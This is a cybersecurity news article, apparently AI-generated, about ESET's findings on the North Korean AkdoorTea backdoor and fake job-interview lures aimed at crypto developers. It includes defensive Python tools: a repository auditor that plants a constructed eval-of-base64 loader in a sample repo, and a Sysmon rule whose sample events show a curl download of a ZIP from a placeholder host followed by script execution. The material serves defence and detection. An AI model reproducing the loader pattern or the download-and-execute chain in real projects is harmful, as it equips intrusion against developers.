Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

North Korean Hackers Unveil New AkdoorTea Backdoor: A Global Crypto Developer's Worst Nightmare




ESET has disclosed AkdoorTea, a previously undocumented backdoor that North Korean threat actors are using against software developers, in particular those working on cryptocurrency and Web3 projects. The backdoor is one component of a wider toolset, tracked by ESET as DeceptiveDevelopment and overlapping with the Contagious Interview campaign, that steals sensitive data from browsers and cryptocurrency wallets and delivers additional malware including BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. Code overlaps tie the activity to the larger Lazarus Group umbrella.

  • The AkdoorTea backdoor is attributed to North Korean threat actors associated with the Contagious Interview campaign, targeting software developers on Windows, Linux, and macOS.
  • The malware is delivered via phishing attacks impersonating job offers on platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List.
  • The attacks install malware such as TsunamiKit, Tropidoor, BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost.
  • The DeceptiveDevelopment group's toolset is mostly multi-platform and includes obfuscated scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET.
  • Tropidoor shares code with the Lazarus Group tools LightlessCan and PostNapTea, and ESET calls it the most sophisticated payload yet linked to DeceptiveDevelopment.
  • The campaign shares some level of overlaps with Pyongyang's fraudulent IT worker scheme (aka WageMole), believed to have been ongoing since 2017.



    In a recent report, Slovak cybersecurity firm ESET attributed a new backdoor called AkdoorTea to North Korean threat actors associated with the Contagious Interview campaign, which ESET tracks as DeceptiveDevelopment. The malware targets software developers on Windows, Linux, and macOS, particularly those working on cryptocurrency and Web3 projects.

    AkdoorTea is one piece of a larger toolset that also includes TsunamiKit and Tropidoor. Across the campaign, the attackers steal sensitive data from browsers and cryptocurrency wallets and deliver additional malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. Initial access is social engineering: fake recruiters offer what appear to be lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List.

    Once a prospective target expresses interest in the opportunity, they are asked either to complete a video assessment by clicking a link or to finish a coding exercise. The coding assignment requires them to clone projects hosted on GitHub that silently install malware when the project is set up or run. The websites set up for the so-called video assessment display fake errors claiming that camera or microphone access is blocked, and urge the victim to follow ClickFix-style instructions to fix the problem by running the supplied commands in the Command Prompt or the Terminal app, depending on the operating system.
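    The coding-assignment lure works because a freshly cloned project can run code before the developer has read any of it. The following is an added example, not code from ESET's report or from the campaign: it audits a cloned repository for the auto-execution hooks such projects commonly abuse. The hook locations checked (npm lifecycle scripts, VS Code tasks with runOn folderOpen, loader-like eval/base64 patterns in source files) are assumptions about typical vectors, not mechanisms the page attributes to this campaign, and the sample repository it builds in a temp directory is constructed for the demonstration.

```python
import json
import re
import tempfile
from pathlib import Path
from typing import List

# npm runs these script names automatically during `npm install`.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py"}
# Heuristic for a dropper-style loader: eval/Function over decoded data, or a
# long run of escaped bytes.  Heuristic only: legitimate code can match and
# better-hidden loaders will not.
OBFUSCATION = re.compile(
    r"eval\(|new Function\(|atob\(|Buffer\.from\([^)]*base64|(\\x[0-9a-f]{2}){8,}",
    re.I,
)


def audit_repo(root: Path) -> List[str]:
    """Return findings for code that would run without the developer deliberately
    executing it: npm lifecycle hooks, VS Code tasks that fire on folder open,
    and source files that look like loaders."""
    findings: List[str] = []

    pkg = root / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        for name, cmd in scripts.items():
            if name in NPM_LIFECYCLE:
                findings.append(f"npm lifecycle hook '{name}' runs on install: {cmd}")

    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():
        try:
            # VS Code tolerates comments in tasks.json; strict parsing can fail on
            # real repos, which is itself a reason to open the file and look.
            for task in json.loads(tasks.read_text()).get("tasks", []):
                if task.get("runOptions", {}).get("runOn") == "folderOpen":
                    findings.append(
                        f"VS Code task '{task.get('label')}' runs on folderOpen: {task.get('command')}"
                    )
        except json.JSONDecodeError:
            findings.append("tasks.json present but not strict JSON; review manually")

    for path in root.rglob("*"):
        if (path.is_file() and path.suffix in SOURCE_SUFFIXES
                and "node_modules" not in path.parts and ".git" not in path.parts):
            if OBFUSCATION.search(path.read_text(errors="ignore")):
                findings.append(f"loader-like code in {path.relative_to(root)}")
    return findings


def build_sample_repo() -> Path:
    """Constructed sample 'assignment' repo in a temp dir (not a real campaign artifact)."""
    root = Path(tempfile.mkdtemp(prefix="assignment-"))
    (root / "package.json").write_text(json.dumps({
        "name": "trading-dashboard-task",
        "scripts": {"test": "jest", "postinstall": "node ./config/init.js"},
    }))
    (root / "config").mkdir()
    # Constructed: a base64 literal handed straight to eval, the classic loader shape.
    (root / "config" / "init.js").write_text(
        'const k = "Y29uc29sZS5sb2coImhlbGxvIik=";\n'
        'eval(Buffer.from(k, "base64").toString());\n'
    )
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "setup", "type": "shell", "command": "npm install",
                   "runOptions": {"runOn": "folderOpen"}}],
    }))
    (root / "src").mkdir()
    (root / "src" / "app.js").write_text("export const add = (a, b) => a + b;\n")
    return root


if __name__ == "__main__":
    for finding in audit_repo(build_sample_repo()):
        print("[!]", finding)
```

    Point it at a real clone with audit_repo(Path("path/to/clone")) before running anything in it. The audit complements, rather than replaces, the basic hygiene for untrusted assignments: install with `npm install --ignore-scripts`, keep VS Code Workspace Trust in Restricted Mode for unfamiliar folders so folderOpen tasks do not fire, and do the work in a disposable VM with no wallet or credential material on it.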

    Among the payloads is the remote access trojan AkdoorTea, which is delivered by means of a Windows batch script. The script downloads a ZIP archive ("nvidiaRelease.zip") and executes a Visual Basic Script contained in it, which in turn launches the BeaverTail and AkdoorTea payloads also stored in the archive.
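    That delivery chain leaves a recognisable shape in process-creation telemetry: a batch file under cmd.exe, a child that fetches or unpacks a ZIP, and wscript.exe running a .vbs from a user-writable directory. The following is an added detection example, not code from ESET or from the page, that walks parent/child links in Sysmon Event ID 1-style records and flags that pattern. The event records are constructed for the example; apart from nvidiaRelease.zip, the file names (setup_env.bat, update.vbs) and the node.exe child standing in for the JavaScript payload are assumptions.

```python
import json
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
FETCHERS = {"curl.exe", "certutil.exe", "powershell.exe", "pwsh.exe", "bitsadmin.exe"}
UNPACKERS = {"tar.exe", "expand.exe", "powershell.exe", "pwsh.exe"}
# Locations a non-admin user can write to.  A batch file launching a .vbs from
# here is far rarer than one under Program Files or an admin-managed share.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\", re.I)

# Constructed Sysmon Event ID 1-style records (not real telemetry).  The chain
# mirrors the description above: a batch file fetches nvidiaRelease.zip, the
# archive is expanded, wscript.exe runs a .vbs from inside it, and that script
# starts the payload.  A benign batch -> wscript pair is included so the rule has
# something it should not fire on.
SAMPLE_EVENTS = r"""
{"ProcessGuid":"{1}","ParentProcessGuid":"{0}","Image":"C:\\Windows\\explorer.exe","CommandLine":"explorer.exe"}
{"ProcessGuid":"{2}","ParentProcessGuid":"{1}","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c C:\\Users\\dev\\Downloads\\setup_env.bat"}
{"ProcessGuid":"{3}","ParentProcessGuid":"{2}","Image":"C:\\Windows\\System32\\curl.exe","CommandLine":"curl -o C:\\Users\\dev\\AppData\\Local\\Temp\\nvidiaRelease.zip https://example.invalid/nvidiaRelease.zip"}
{"ProcessGuid":"{4}","ParentProcessGuid":"{2}","Image":"C:\\Windows\\System32\\tar.exe","CommandLine":"tar -xf C:\\Users\\dev\\AppData\\Local\\Temp\\nvidiaRelease.zip -C C:\\Users\\dev\\AppData\\Local\\Temp\\nvidiaRelease"}
{"ProcessGuid":"{5}","ParentProcessGuid":"{2}","Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe C:\\Users\\dev\\AppData\\Local\\Temp\\nvidiaRelease\\update.vbs"}
{"ProcessGuid":"{6}","ParentProcessGuid":"{5}","Image":"C:\\Users\\dev\\AppData\\Local\\Temp\\nvidiaRelease\\node.exe","CommandLine":"node.exe main.js"}
{"ProcessGuid":"{7}","ParentProcessGuid":"{1}","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c C:\\Scripts\\nightly_build.bat"}
{"ProcessGuid":"{8}","ParentProcessGuid":"{7}","Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe C:\\Scripts\\notify.vbs"}
"""


def parse_events(text: str) -> Dict[str, dict]:
    """Index newline-delimited JSON events by ProcessGuid."""
    return {ev["ProcessGuid"]: ev
            for ev in (json.loads(line) for line in text.splitlines() if line.strip())}


def image_name(ev: dict) -> str:
    return ev["Image"].rsplit("\\", 1)[-1].lower()


def ancestors(ev: dict, events: Dict[str, dict]) -> List[dict]:
    """Parent chain, nearest first; stops at a missing parent or a cycle."""
    chain, seen = [], set()
    guid = ev.get("ParentProcessGuid")
    while guid in events and guid not in seen:
        seen.add(guid)
        chain.append(events[guid])
        guid = events[guid].get("ParentProcessGuid")
    return chain


def children(guid: str, events: Dict[str, dict]) -> List[dict]:
    return [e for e in events.values() if e.get("ParentProcessGuid") == guid]


def detect_batch_zip_vbs_chain(text: str) -> List[dict]:
    """One finding per wscript/cscript launch of a .vbs in a user-writable path
    whose nearest batch-file cmd.exe ancestor also spawned a process that
    fetched or unpacked a .zip.  The script host's children are reported so the
    analyst can see what the VBS went on to start."""
    events = parse_events(text)
    findings = []
    for ev in events.values():
        if image_name(ev) not in SCRIPT_HOSTS:
            continue
        cmd = ev["CommandLine"]
        if ".vbs" not in cmd.lower() or not USER_WRITABLE.search(cmd):
            continue
        batch = next((a for a in ancestors(ev, events)
                      if image_name(a) == "cmd.exe" and ".bat" in a["CommandLine"].lower()), None)
        if batch is None:
            continue
        zip_activity = [c["CommandLine"] for c in children(batch["ProcessGuid"], events)
                        if ".zip" in c["CommandLine"].lower()
                        and image_name(c) in FETCHERS | UNPACKERS]
        if not zip_activity:
            continue
        findings.append({
            "batch": batch["CommandLine"],
            "script_host": cmd,
            "zip_activity": zip_activity,
            "spawned": [image_name(c) for c in children(ev["ProcessGuid"], events)],
            "known_archive_name": any("nvidiarelease.zip" in z.lower() for z in zip_activity),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_batch_zip_vbs_chain(SAMPLE_EVENTS):
        print(json.dumps(finding, indent=2))
```

    The archive name is reported as a bonus indicator rather than used as a gate, since it is trivially changed; the behavioural shape (batch file, ZIP fetch or unpack, script host from a user-writable path) is what the rule keys on. The ClickFix variant of the lure, where the victim types the commands into a terminal, would show up with explorer.exe or a console host as the parent instead of a batch file, so a production rule should not insist on the cmd.exe ancestor alone.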

    AkdoorTea gets its name from its commonalities with Akdoor, a variant of the NukeSped (aka Manuscrypt) implant, further reinforcing Contagious Interview's connections to the larger Lazarus Group umbrella.

    "DeceptiveDevelopment's toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET," ESET researchers Peter Kálnai and Matěj Havránek said.


    The attacks also deliver TsunamiKit and Tropidoor. TsunamiKit comprises several components: the initial stage, TsunamiLoader, triggers the execution of an injector (TsunamiInjector), which in turn drops TsunamiInstaller and TsunamiHardener.

    "TsunamiKit is likely a modification of a dark web project rather than a native creation of the threat actor, given that samples related to the toolkit have been uncovered dating back to December 2021, predating the onset of Contagious Interview, which is believed to have commenced sometime in late 2022," ESET said.

    The BeaverTail stealer and downloader has also been found to act as a distribution vehicle for another malware known as Tropidoor, which, according to ASEC, overlaps with a Lazarus Group tool called LightlessCan. ESET said it found Tropidoor artifacts uploaded to VirusTotal from Kenya, Colombia, and Canada, adding that the malware also shares "large portions of code" with PostNapTea, a malware used by the threat actor against South Korean targets in 2022.

    PostNapTea supports commands for configuration updates, file manipulation and screen capturing, file system management, process management, and running custom implementations of Windows commands like whoami, netstat, tracert, lookup, ipconfig, and systeminfo. Re-implementing these utilities inside the implant instead of spawning the real binaries means no child process appears in process-creation telemetry, which is what makes the feature a stealth measure; LightlessCan takes the same approach.

    "The Tropidoor malware is the most sophisticated payload yet linked to the DeceptiveDevelopment group, probably because it is based on malware developed by the more technically advanced threat actors under the Lazarus umbrella," ESET said.

    The campaign has been found to share some level of overlaps with Pyongyang's fraudulent IT worker scheme (aka WageMole), which is believed to have been ongoing since 2017. Cybersecurity company Trellix, in a report published this week, said it uncovered an instance of a North Korean IT worker employment fraud targeting a U.S. healthcare company, where an individual using the name "Kyle Lankford" applied for a Principal Software Engineer position.

    "The activities of North Korean IT workers constitute a hybrid threat," ESET noted. "This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime (or e-crime)."

    AkdoorTea is, in short, only the newest component of a toolset that DeceptiveDevelopment uses against crypto developers worldwide. The campaign steals sensitive data from browsers and cryptocurrency wallets and delivers additional malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost, and the code it shares with Akdoor, LightlessCan, and PostNapTea places it under the Lazarus Group umbrella.




    Related Information:
  • https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Unveil-New-AkdoorTea-Backdoor-A-Global-Crypto-Developers-Worst-Nightmare-ehn.shtml

  • https://thehackernews.com/2025/09/north-korean-hackers-use-new-akdoortea.html

  • https://tech-wire.in/technology/cyber-security/north-korean-hackers-use-new-akdoortea-backdoor-to-target-global-crypto-developers/

  • https://the420.in/north-korea-akdoortea-malware-targets-crypto-developers/

  • https://gbhackers.com/beavertail-malware/

  • https://forums.malwarebytes.com/topic/318523-beavertail-and-invisibleferret-malware-target-job-seeking-mac-users/

  • https://anyrun.substack.com/p/invisibleferret-malware-technical

  • https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/

  • https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

  • https://www.pcrisk.com/removal-guides/32075-ottercookie-malware

  • https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Script/NukeSped.I

  • https://www.cyfirma.com/research/nukesped-rat-report/

  • https://thehackernews.com/2025/02/north-korean-hackers-target-freelance.html

  • https://www.bleepingcomputer.com/news/security/new-ottercookie-malware-used-to-backdoor-devs-in-fake-job-offers/

  • https://en.wikipedia.org/wiki/Lazarus_Group

  • https://cybersecuritynews.com/lazarus-group-is-no-longer-consider-a-single-apt-group/

  • https://www.silentpush.com/blog/contagious-interview-front-companies/

  • https://cybersecuritynews.com/north-korean-apt-hackers-create-companies-to-deliver-malware-strains/

  • https://www.fbi.gov/wanted/cyber/apt-41-group

  • https://attack.mitre.org/groups/G0096/

  • https://securityaffairs.com/172221/apt/lazarus-apt-targeted-employees-unnamed-nuclear-related-org.html


  • Published: Fri Sep 26 09:51:07 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.
